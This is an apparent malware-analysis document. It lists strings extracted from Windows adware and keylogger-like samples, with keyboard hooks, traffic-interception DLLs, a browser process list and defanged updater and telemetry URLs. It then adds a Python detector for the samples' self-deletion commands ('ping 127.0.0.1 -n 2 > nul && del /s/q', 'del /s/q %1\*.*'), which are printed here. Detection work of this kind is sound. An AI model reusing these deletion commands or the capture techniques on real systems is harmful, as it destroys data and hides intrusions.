TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start WNet
cmd.exe /c net stop WNet
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
ActSys.exe_2648:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeyword
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx4D
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute
iexplore.exe
firefox.exe
chrome.exe
safari.exe
opera.exe
netscape.exe
torch.exe
seamonkey.exe
k-meleon.exe
konqueror.exe
maxthon.exe
flock.exe
lunascape.exe
amaya.exe
midori.exe
kidzui.exe
rockmelt.exe
sbrowser.exe
slimbrowser.exe
kidrocket.exe
epic.exe
ironbrowser.exe
comodo.exe
comododragon.exe
crazybrowser.exe
arora.exe
shenzbrowser.exe
enigmabrowser.exe
avant.exe
avantbrowser.exe
orca.exe
xbbrowser.exe
xbrowser.exe
sleipnir.exe
spacetime.exe
3dbrowse.exe
bitty.exe
java.exe
grail.exe
lynx.exe
twb.exe
tt.exe
pinkbrowser.exe
nuke.exe
acoo.exe
palemoon.exe
slimboat.exe
dooble.exe
menubox.exe
chromium.exe
ultrabrowser.exe
zac.exe
kylo.exe
morequick.exe
wyzo.exe
xombrero.exe
qupzilla.exe
cometbird.exe
qtweb.exe
deepnet.exe
xtravo.exe
smartbro.exe
jumpto.exe
weblock4kids.exe
weblock.exe
comodoice.exe
srwareiron.exe
srware.exe
coolnovo.exe
cool.exe
qup.exe
browseme.exe
swiftfox.exe
omniweb.exe
omni.exe
spark.exe
bobrowser.exe
crossbrowser.exe
crossbrowse.exe
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start ActSys
cmd.exe /c net stop ActSys
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
ProtectService.exe_3496:
.text
`.rdata
@.data
.rsrc
@.reloc
GET %s%s%s HTTP/1.1
Host: %s
%sUser-Agent: Mozilla/4.0
POST %s HTTP/1.1
%sContent-Type: %s
User-Agent: Mozilla/4.0
Content-Length: %u
%*s %d %*s
%*[ ]%[^
file_url
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
MSVCP110.dll
InternetCrackUrlW
WININET.dll
WS2_32.dll
SHLWAPI.dll
MSVCR110.dll
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
_calloc_crt
__crtGetShowWindowMode
_amsg_exit
_wcmdln
__crtSetUnhandledExceptionFilter
WinHttpCloseHandle
WinHttpOpen
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
SensApi.dll
VERSION.dll
PSAPI.DLL
USERENV.dll
.?AVCHttpClient@@
.?AVCTcpipSocket@@
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
xxxx
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
UpDateProcess.exe
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Report HeartBeat
cmdshell.exe
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
explorer.exe
Advapi32.dll
"%s" %s
psapi.dll
Explorer.exe
json_value.cpp
ljson_reader.cpp
ProtectSvc.exe
4.0.1.2105
HPNotify.exe_3664:
.text
`.rdata
@.data
.rsrc
@.reloc
wszUrl
strUrlTemp
hKEY
strSelUrl
strUrl
strConfUrlTemp
strDsUrl
strHpUrl
strCmdLine
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentDsUrl
URLDownloadToFileW
URLDownloadToFileW ret:0XX
Error : %d
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
monochrome
unsupported bit depth
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%s%s
RegOpenKeyExW
RegCloseKey
del /s/q %1\*.*
%suninstall.bat
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHDeleteKeyW
SHLWAPI.dll
MSVCP110.dll
MSVCR110.dll
_calloc_crt
_CRT_RTC_INITW
__crtGetShowWindowMode
_amsg_exit
_wcmdln
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
GdiplusShutdown
gdiplus.dll
IMM32.dll
DeleteUrlCacheEntryW
WININET.dll
COMCTL32.dll
GetProcessHeap
.?AVCActiveXEnum@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
hXXp://VVV.bing.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.google.com/
%sconf
web/?type=dspp&
web/?type=dspp
hXXp://VVV.v9.com/
Itemd
BrowserAction.dll
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
\\.\Scsi%d:
UrlEdit
conf.xml
hXXp://v9.com/license_agreement.html
hXXp://v9.com/privacy_policy.html
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
%stmp%d.tmp
urlmon.dll
urlmon.dll
main.xml
main.xml
explorer.exe
explorer.exe
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
IeWatchDog.dll
IeWatchDog.dll
BrowerWatchFF.dll
BrowerWatchFF.dll
BrowerWatchCH.dll
BrowerWatchCH.dll
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
Amsimg32.dll
Amsimg32.dll
User32.dll
User32.dll
WM_KEYDOWN
WM_KEYDOWN
WM_KEYUP
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYDOWN
WM_SYSKEYUP
WM_SYSKEYUP
0xX
0xX
keyboard
keyboard
Bmsftedit.dll
Bmsftedit.dll
password
password
%s%s%s
%s%s%s
Correct password required
Correct password required
%s\%s
%s\%s
WebBrowser
WebBrowser
transshadow
transshadow
transshadow1
transshadow1
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
M-d-d
M-d-d
WebBrowserUI
WebBrowserUI
errorUrl
errorUrl
E{D27CDB6E-AE6D-11CF-96B8-444553540000}
E{D27CDB6E-AE6D-11CF-96B8-444553540000}
user32.dll
user32.dll
MSPDB110.DLL
MSPDB110.DLL
ADVAPI32.DLL
ADVAPI32.DLL
/c ping 127.0.0.1 -n 2 > nul && del /s/q
/c ping 127.0.0.1 -n 2 > nul && del /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SupHPNot.exe
SupHPNot.exe
4,0,1,1716
4,0,1,1716
SupHPNty.exe
SupHPNty.exe
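Two of the HPNotify strings describe how the component removes its own files: the cmd.exe argument string "/c ping 127.0.0.1 -n 2 > nul && del /s/q" (the target path is appended at run time) and the "del /s/q %1\*.*" line written into "%suninstall.bat". This is the usual delay-then-delete idiom: the program spawns cmd.exe and exits, ping to loopback burns roughly a second, and del /s/q then silently and recursively wipes the directory the caller lived in, so the binary is gone before a scanner or analyst looks for it. The following is an added example of detecting that shape in process-creation command lines; it is my code, not part of the report or the sample. The Sysmon-like records, the image paths and the install directory in it are constructed for the example.

```python
import re

# del <switches> <target>; switches appear glued together as in "del /s/q <path>"
DEL_RE = re.compile(r"\bdel\s+((?:/[a-z]\s*)+)(.+?)\s*$", re.I)

# cmd.exe shape from the HPNotify strings:  ping 127.0.0.1 -n N > nul && del ...
SELF_DELETE_RE = re.compile(
    r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)\s*>\s*nul\s*&&\s*(del\b.*)$", re.I
)


def parse_del(fragment):
    """Parse 'del /s/q <target>' into (sorted switches, target); None if not a del command."""
    m = DEL_RE.search(fragment)
    if not m:
        return None
    switches = sorted(s.lower() for s in re.findall(r"/([a-z])", m.group(1), re.I))
    target = m.group(2).strip().strip('"')
    return switches, target


def detect_self_delete(cmdline):
    """Return details when cmdline uses the ping-delay-then-del idiom, else None."""
    m = SELF_DELETE_RE.search(cmdline)
    if not m:
        return None
    parsed = parse_del(m.group(2))
    if not parsed:
        return None
    switches, target = parsed
    return {
        # ping waits about one second between echo requests, so N echoes is roughly N-1 seconds
        "delay_s": max(int(m.group(1)) - 1, 0),
        # /q suppresses the wildcard prompt, /s descends into subdirectories
        "quiet_recursive": {"q", "s"} <= set(switches),
        "target": target,
        "wildcard": target.endswith("*.*"),
    }


def _target_dir(target):
    """Directory a del target refers to, with a trailing \\*.* wildcard removed."""
    t = target.lower()
    return t[:-4] if t.endswith("\\*.*") else t


def scan_process_events(events):
    """Flag cmd.exe launches that delay-then-delete; note when the parent lives in the target."""
    findings = []
    for ev in events:
        if not ev["Image"].lower().endswith("\\cmd.exe"):
            continue
        hit = detect_self_delete(ev["CommandLine"])
        if not hit:
            continue
        parent = ev["ParentImage"].lower()
        tdir = _target_dir(hit["target"]).rstrip("\\")
        # The parent deleting its own directory is what makes this self-removal, not cleanup.
        hit["parent_in_target"] = parent == tdir or parent.startswith(tdir + "\\")
        hit["parent"] = ev["ParentImage"]
        findings.append(hit)
    return findings


# Constructed Sysmon-style process-creation records; the install path is invented.
SAMPLE_EVENTS = [
    {"Image": r"C:\WINDOWS\system32\cmd.exe",
     "ParentImage": r"C:\Program Files\SearchProtect\HPNotify.exe",
     "CommandLine": r'cmd.exe /c ping 127.0.0.1 -n 2 > nul && del /s/q "C:\Program Files\SearchProtect\*.*"'},
    {"Image": r"C:\WINDOWS\system32\cmd.exe",
     "ParentImage": r"C:\WINDOWS\explorer.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users"},
    {"Image": r"C:\WINDOWS\system32\ping.exe",
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": "ping 127.0.0.1 -n 2"},
]

if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_EVENTS):
        print(f)
```

The same parse_del check applied to the contents of a dropped .bat file catches the "del /s/q %1\*.*" uninstall script before it runs; a recursive quiet delete whose target is a batch parameter is worth a look on its own, even without the ping prefix.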